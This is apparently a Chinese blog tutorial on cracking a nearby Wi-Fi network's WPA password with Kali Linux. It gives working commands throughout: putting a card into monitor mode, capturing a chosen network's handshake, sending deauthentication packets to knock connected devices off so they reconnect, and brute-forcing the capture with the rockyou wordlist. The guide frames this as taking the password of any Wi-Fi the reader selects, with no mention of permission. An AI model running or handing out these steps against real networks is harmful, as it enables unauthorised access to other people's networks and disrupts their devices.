kali暴力破解wifi密码

一、原理简述
kali通过监听wifi,抓取含有密码的包,最后通过暴力破解获取密码
 
二、步骤描述
1.购买一张无线网卡,需要具有monitor模式
2.将无线网卡插入物理机,并配置给kali虚拟机
3.监听周围的wifi热点,选择想要获取密码的wifi
4.抓包
5.暴力破解密码
 
三、过程演示
1. 查看无线网卡是否接入成功,成功会看到wlan0出现
ifconfig -a     //或者airmon-ng都可以
1.png


2. 开启网卡监听模式
airmon-ng start wlan0   //wlan0是无线网卡
2.png


3. 再次查看网卡信息,注意这里一定是mon结尾,否则是你的网卡无monitor模式
ifconfig -a     //或者airmon-ng都可以
3.png


4. 开始监听周围WiFi热点,显示各个WiFi热点(ctrl C可以停止监听)
airodump-ng wlan0mon
4.png

上面图片部分参数的意思:
BSSID:MAC地址。
PWR:信号强度,越小信号越强。
#Data:传输的数据。
CH:信号频道,只有在一个频道才可进行下一步操作。
ESSID:wifi的名称,中文的可能会乱码。
 
5.抓包
airodump-ng -c 6 --bssid C6:F1:28:14:F1:F9 -w /home wlan0mon   //-c 频道(ch) --bssid wifi的MAC地址 -w 用来存储抓包的目录
5.png

抓包成功窗口右上角出现WPA handshake,如下图
8.png


5.1攻击性抓包原理是,给连接到wifi的一个设备发送一个deauth(反认证)包,让那个设备断开wifi,随后它自然会再次连接wifi。那么自然可以抓到包
获取包的前提是有用户连接此wifi,即我们抓取的包是新用户连接此wifi的过程产生的流量,但是如果没有新用户怎么办?我们不能一直等下去,否则就相当于看运气。那么我们就让想办法让一个已经连接过的设备重新连接。所以需要我们主动发起攻击让其断开网络,这时候我们是一直抓包的,如果设备选择过自动连接或者用户手动连接,那么就可以抓包了。
在第五步的抓包图片下半部分有一个station参数,那里显示的是连接此wifi的设备MAC地址,打开新的shell输入下面的命令。
aireplay-ng -0 5 -a C6:F1:28:14:F1:F9 -c xx:xx:xx:xx:xx:xx wlan0mon //-0 5 攻击某个设备的次数,0为无限,-0 5则为攻击五次 -a wifi的MAC地址 -c 连接wifi的设备MAC地址

5.2抓包过程
在做第五步抓包时,由于是后台抓包,我们可能因为看不到抓包过程感到不习惯,或者以为还没有抓到包,而一直等下去,这时候就可以打开一个新的shell窗口,输入下面的命令,方便观察抓包过程
aireplay-ng -0 0 -a mac地址 网卡名
6.png


6.暴力破解
可以使用kali自带的密码字典(也可以使用自己的字典),路径: /usr/share/wordlists/rockyou.txt.gz,解压命令:
gzip -d /usr/share/wordlists/rockyou.txt.gz
在shell中输入下面命令,开始破解
aircrack-ng -w /usr/share/wordlists/rockyou.txt home-01.cap  //-w 字典路径 home-01.cap 第五步抓到的包(具体路径填写第五步的路径)
破解成功如下图
7.png


四、参考文章
以上内容参考自下面两篇文章,图片也出自此
作者:AI_Engine,链接:https://www.jianshu.com/p/4fa9d154db5d
作者:叛逆不坏小子,链接:https://blog.csdn.net/qq_41203799/article/details/79945133
 

0 个评论

要回复文章请先登录注册